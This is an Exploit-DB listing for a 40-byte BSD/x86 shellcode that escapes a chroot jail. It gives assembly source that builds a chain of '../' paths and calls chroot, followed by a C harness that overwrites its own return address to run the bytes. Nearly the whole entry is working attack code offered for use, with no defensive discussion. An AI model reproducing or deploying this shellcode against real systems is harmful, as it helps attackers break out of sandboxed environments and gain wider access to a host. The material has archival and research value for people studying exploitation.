BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes)

2009-01-01T00:00:00
ID EDB-ID:43636
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes). Shellcode exploit for BSD_x86 platform

                                        
                                            /* One of the smallest chroot shellcodes
   it will put '../' 10 times
   Size  40 bytes
   OS	 *BSD
  		/rootteam/dev0id	(rootteam.void.ru)
			dev0id@uncompiled.com 


BITS	32

jmp short callme
main:
	pop	esi
	mov	edi,esi
	xor	ecx,ecx
	xor	eax,eax
	push	eax
	mov	cl,0x1e
	mov	al,0x2e
	repne   stosb
	pop	eax
	stosb
	mov	cl,0x1e
main_loop:
	dec	cl
	inc byte [esi+ecx]
	dec	cl
	loop	main_loop
	push 	esi
	mov	al,0x3d
	push	eax
	int	0x80
callme:
	call	main
*/

char shellcode[] =
	"\xeb\x21\x5e\x89\xf7\x31\xc9\x31\xc0\x50\xb1\x1e\xb0\x2e\xf2"
	"\xaa\x58\xaa\xb1\x1e\xfe\xc9\xfe\x04\x0e\xfe\xc9\xe2\xf7\x56"
	"\xb0\x3d\x50\xcd\x80\xe8\xda\xff\xff\xff";

int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}